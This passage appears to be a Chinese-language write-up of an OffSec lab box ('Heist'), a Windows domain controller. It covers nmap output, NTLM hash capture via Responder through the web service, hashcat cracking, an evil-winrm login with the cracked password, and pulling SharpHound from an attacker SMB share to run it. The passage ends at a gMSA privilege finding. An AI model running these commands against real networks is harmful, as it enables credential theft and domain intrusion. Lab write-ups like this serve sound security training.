PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 8080/tcp open http-proxy 9389/tcp open adws 49666/tcp open unknown 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49677/tcp open unknown 49704/tcp open unknown 49759/tcp open unknown
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-23 06:24:40Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: HEIST | NetBIOS_Domain_Name: HEIST | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: heist.offsec | DNS_Computer_Name: DC01.heist.offsec | DNS_Tree_Name: heist.offsec | Product_Version: 10.0.17763 |_ System_Time: 2025-09-23T06:25:33+00:00 | ssl-cert: Subject: commonName=DC01.heist.offsec | Not valid before: 2025-09-22T06:18:30 |_Not valid after: 2026-03-24T06:18:30 |_ssl-date: 2025-09-23T06:26:11+00:00; -2s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0) |_http-server-header: Werkzeug/2.0.1 Python/3.9.0 |_http-title: Super Secure Web Browser 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49704/tcp open msrpc Microsoft Windows RPC 49759/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
系统为 Windows 域环境,开放有 HTTP、WINRM、RDP 和 Windows 域控的一些默认服务。
域控信息:
1 2 3 4
# 域控域名 heist.offsec # 域控 KDC DC01.heist.offsec
3.2 渗透测试突破边界
3.2.1 HTTP 服务抓取 Windows Net NTLM Hash
本地添加靶机域控域名、KDC 解析。
1
echo"192.168.166.165\tdc01.heist.offsec heist.offsec" | sudotee -a /etc/hosts
靶机 SMB、LDAP 服务枚举过程未发现有价值信息,访问靶机 HTTP 8080 时,发现可通过 web 访问外部链接资源,在靶机开启 responder 监听,然后通过 web 访问 kali responder HTTP 服务,抓取到 enox 用户 Net NTLM V2 Hash。
1
sudo responder -I tun0
将 Net NTLM V2 Hash 保存至文本,通过 hashcat 破解得到 enox 用户明文密码。
1
hashcat hash ~/Desktop/rockyou.txt
使用 evil-winrm 连接靶机(enox 权限)。
1
evil-winrm -i 192.168.166.165 -u enox -p california
为了方便后续文件传输,可以在 kali 开启 SMB 文件共享,靶机连接 kali SMB 服务可以上传和下载需要的文件, 注意: 有时靶机防火墙设置拒绝 139/445 端口出站,而 Windows net use 命令固定使用 139/445 端口,这将导致无法连接 kali SMB 共享,这个时候只能通过其他方式传输文件。
1
impacket-smbserver share ./ -smb2support -username kali -password kali
将 sharphound 上传至靶机, 注意: kali 自带的 sharphound 收集到的信息无法导入老版本 bloodhound。
1 2 3
net use \\192.168.45.227\share /user:kali kali copy \\192.168.45.227\share\SharpHound.exe .\ .\SharpHound.exe -c all
使用 bloodhound 分析收集到的日志,发现 SVC_APACHE$ 用户对域控也具有远程管理权限,而且 WEB ADMIN 组对该用户具有 ReadGMSAPassword 权限。